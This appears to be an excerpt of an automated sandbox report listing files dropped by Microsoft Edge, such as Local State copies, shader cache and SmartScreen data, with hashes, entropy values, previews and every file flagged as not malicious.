                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41f6b.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41fc9.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41fd8.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43fb5.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4df7f.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF506ae.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF53dbc.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNlsy+:Ls3sy+
                                                                                                                                                                  MD5:FE625A92DAD7AA317B11AC4E54BC15DC
                                                                                                                                                                  SHA1:A7A647D64BA1C97F33B31077DCC1CC766997BF25
                                                                                                                                                                  SHA-256:E20A4C12E43A48AABC7BA1384FA3F396CC9FA990B01241340DDD115CF6CE5795
                                                                                                                                                                  SHA-512:1B33FC435E126C3BB8B54BD93D431D5041423C513F0725F686E2BB2B61886539E287517FF3BF5C381E33D4273C8374618E07A23F733ABCF373E583A4762CF2FD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................\.sH../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"forceServiceDetermination":false}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                  Entropy (8bit):3.922828737239167
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                  MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                  SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                  SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                  SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:customSynchronousLookupUris_0

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

